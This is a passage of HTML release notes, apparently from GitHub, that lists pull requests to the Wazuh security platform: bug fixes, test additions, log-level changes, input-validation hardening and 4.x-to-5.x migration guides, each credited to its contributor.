<li>Improve the method of detecting duplicates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4504512576" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36344" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36344/hovercard" href="https://github.com/wazuh/wazuh/pull/36344">#36344</a></li>
<li>Fix race condition preventing inventory synchronization after agent reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551769345" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36682" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36682/hovercard" href="https://github.com/wazuh/wazuh/pull/36682">#36682</a></li>
<li>Added API integration tests workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4472493573" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36196" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36196/hovercard" href="https://github.com/wazuh/wazuh/pull/36196">#36196</a></li>
<li>Fix non-atomic write for <code>file_status.json</code> in logcollector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4565514906" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36722" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36722/hovercard" href="https://github.com/wazuh/wazuh/pull/36722">#36722</a></li>
<li>Make agent-info shutdown waits interruptible by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4564093587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36719" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36719/hovercard" href="https://github.com/wazuh/wazuh/pull/36719">#36719</a></li>
<li>Validate IP address in ip-customblock active response by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4570134407" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36730" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36730/hovercard" href="https://github.com/wazuh/wazuh/pull/36730">#36730</a></li>
<li>wazuh-agent remains active after uninstall on Fedora 44 / DNF5 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568853035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36727/hovercard" href="https://github.com/wazuh/wazuh/pull/36727">#36727</a></li>
<li>Use per-target rpath and remove redundant LD_LIBRARY_PATH/WAZUH_ENGINE_GROUP exports by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4531005682" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36455" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36455/hovercard" href="https://github.com/wazuh/wazuh/pull/36455">#36455</a></li>
<li>Fix changelog chronological order and update bumper script by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4569560130" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36729" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36729/hovercard" href="https://github.com/wazuh/wazuh/pull/36729">#36729</a></li>
<li>Monitoring a symlink without follow_symbolic_link by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4444803761" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36081" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36081/hovercard" href="https://github.com/wazuh/wazuh/pull/36081">#36081</a></li>
<li>SCA policies migration guide from 4.x to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4550901765" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36671" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36671/hovercard" href="https://github.com/wazuh/wazuh/pull/36671">#36671</a></li>
<li>Fix 5x  wazuhdb integration tests  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4562864780" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36713" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36713/hovercard" href="https://github.com/wazuh/wazuh/pull/36713">#36713</a></li>
<li>Downgrade transient manager-reported sync failures logs to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4576461814" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36744" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36744/hovercard" href="https://github.com/wazuh/wazuh/pull/36744">#36744</a></li>
<li>Show sca timouts as Not Run by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4488962491" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36258" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36258/hovercard" href="https://github.com/wazuh/wazuh/pull/36258">#36258</a></li>
<li>Authd workflow creation for 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4522600046" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36404" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36404/hovercard" href="https://github.com/wazuh/wazuh/pull/36404">#36404</a></li>
<li>Adapt remoted tests to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4541524155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36609" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36609/hovercard" href="https://github.com/wazuh/wazuh/pull/36609">#36609</a></li>
<li>Update unclassified event criteria by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4551542627" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36681" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36681/hovercard" href="https://github.com/wazuh/wazuh/pull/36681">#36681</a></li>
<li>use safeloader in yaml file loader by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4582767203" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36753" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36753/hovercard" href="https://github.com/wazuh/wazuh/pull/36753">#36753</a></li>
<li>Downgrade expected modulesd socket warnings/errors during agent restart to debug by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583215822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36755" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36755/hovercard" href="https://github.com/wazuh/wazuh/pull/36755">#36755</a></li>
<li>Documentation: Ciscat and openscap migration to SCA by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpcerrone/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpcerrone">@jpcerrone</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4566095438" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36723" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36723/hovercard" href="https://github.com/wazuh/wazuh/pull/36723">#36723</a></li>
<li>Document the deprecation of OSquery in order to use IT Hygiene in version 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583642489" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36756" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36756/hovercard" href="https://github.com/wazuh/wazuh/pull/36756">#36756</a></li>
<li>Preserve wazuh-syscheckd Full Disk Access attribution on macOS reload by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4583103632" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36754" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36754/hovercard" href="https://github.com/wazuh/wazuh/pull/36754">#36754</a></li>
<li>Normalize severity Msg  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4588829137" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36759" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36759/hovercard" href="https://github.com/wazuh/wazuh/pull/36759">#36759</a></li>
<li>Agent Groups 5x Migration Guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4568131074" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36726" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36726/hovercard" href="https://github.com/wazuh/wazuh/pull/36726">#36726</a></li>
<li>Add NULL validation for optional FlatBuffer fields in inventory_sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4598119007" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36773/hovercard" href="https://github.com/wazuh/wazuh/pull/36773">#36773</a></li>
<li>Fix agent keepalive scheduling after system clock rollback by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4503704905" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36338" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36338/hovercard" href="https://github.com/wazuh/wazuh/pull/36338">#36338</a></li>
<li>Create integratord migration guide to 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Adman23/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Adman23">@Adman23</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4580559348" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36750" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36750/hovercard" href="https://github.com/wazuh/wazuh/pull/36750">#36750</a></li>
<li>Syslog output (csyslogd) 5.0 migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/gonzaarancibia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/gonzaarancibia">@gonzaarancibia</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4573759572" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36741" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36741/hovercard" href="https://github.com/wazuh/wazuh/pull/36741">#36741</a></li>
<li>Merge merge-4.14.7-into-main into main [automated] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4596517095" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36767" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36767/hovercard" href="https://github.com/wazuh/wazuh/pull/36767">#36767</a></li>
<li>Migration documentation: syslog input alternative by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613452406" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36781" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36781/hovercard" href="https://github.com/wazuh/wazuh/pull/36781">#36781</a></li>
<li>Drop libcrypt dependency from Python dep by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a></li>
<li>Change duplicated link to intented one by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619366060" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36794" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36794/hovercard" href="https://github.com/wazuh/wazuh/pull/36794">#36794</a></li>
<li>Add centralized input validation for active response framework by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4578234540" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36745" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36745/hovercard" href="https://github.com/wazuh/wazuh/pull/36745">#36745</a></li>
<li>Fix sca check for etc/shadow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4619503472" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36795" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36795/hovercard" href="https://github.com/wazuh/wazuh/pull/36795">#36795</a></li>
<li>Align remoted metrics shipper with new field names by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572800781" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36740" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36740/hovercard" href="https://github.com/wazuh/wazuh/pull/36740">#36740</a></li>
<li>Fix wrap PolicyBanner stat in 'sh -c' so glob expands in macOS SCA check 41062 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615585186" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36783" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36783/hovercard" href="https://github.com/wazuh/wazuh/pull/36783">#36783</a></li>
<li>Bump main branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623354993" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36801" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36801/hovercard" href="https://github.com/wazuh/wazuh/pull/36801">#36801</a></li>
<li>Defer module coordination while FIM first sync is in progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/anromerom/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/anromerom">@anromerom</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591815012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36762" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36762/hovercard" href="https://github.com/wazuh/wazuh/pull/36762">#36762</a></li>
<li>Revert "Bump main branch" by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MARCOSD4/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MARCOSD4">@MARCOSD4</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4623582882" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36802" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36802/hovercard" href="https://github.com/wazuh/wazuh/pull/36802">#36802</a></li>
<li>Change log severity for recoverable and expected conditions by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615970610" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36786" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36786/hovercard" href="https://github.com/wazuh/wazuh/pull/36786">#36786</a></li>
<li>Prevent data race in schema validator factory concurrent initialization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4616512800" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36789" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36789/hovercard" href="https://github.com/wazuh/wazuh/pull/36789">#36789</a></li>
<li>Schema generation for dotted and nested field mappings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4536240667" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36473" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36473/hovercard" href="https://github.com/wazuh/wazuh/pull/36473">#36473</a></li>
<li>Engine support null values in schema validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4535313001" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36470" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36470/hovercard" href="https://github.com/wazuh/wazuh/pull/36470">#36470</a></li>
<li>docs: add Active Response 4.x to 5.x migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jcorredor-spec/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jcorredor-spec">@jcorredor-spec</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4521476970" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36402" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36402/hovercard" href="https://github.com/wazuh/wazuh/pull/36402">#36402</a></li>
<li>Use env mappings for variable passing in builderpackage workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4572105403" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36738" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36738/hovercard" href="https://github.com/wazuh/wazuh/pull/36738">#36738</a></li>
<li>Adds 4.x to 5.x migration documentation. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4615736469" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36785" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36785/hovercard" href="https://github.com/wazuh/wazuh/pull/36785">#36785</a></li>
<li>Fix AWS cross-account SQS queue URL when using iam_role_arn by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4617279433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36791" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36791/hovercard" href="https://github.com/wazuh/wazuh/pull/36791">#36791</a></li>
<li>Fix enrollment key validation and improve input handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4629562793" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36807" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36807/hovercard" href="https://github.com/wazuh/wazuh/pull/36807">#36807</a></li>
<li>Lower agent_sync_protocol and module sync log levels to reduce false-alarm noise by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4634109312" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36817" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36817/hovercard" href="https://github.com/wazuh/wazuh/pull/36817">#36817</a></li>
<li>Add unit tests for utils, aws_tools, DockerListener, gcloud and azure modules by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4591653615" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36761" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36761/hovercard" href="https://github.com/wazuh/wazuh/pull/36761">#36761</a></li>
<li>Normalize numeric inode to string events (6960) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4641496397" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36837" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36837/hovercard" href="https://github.com/wazuh/wazuh/pull/36837">#36837</a></li>
<li>Prevent indexer consumer wait during shutdown by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4640571004" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36836" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36836/hovercard" href="https://github.com/wazuh/wazuh/pull/36836">#36836</a></li>
<li>Update manager 5x documentation  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4639437920" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36833/hovercard" href="https://github.com/wazuh/wazuh/pull/36833">#36833</a></li>
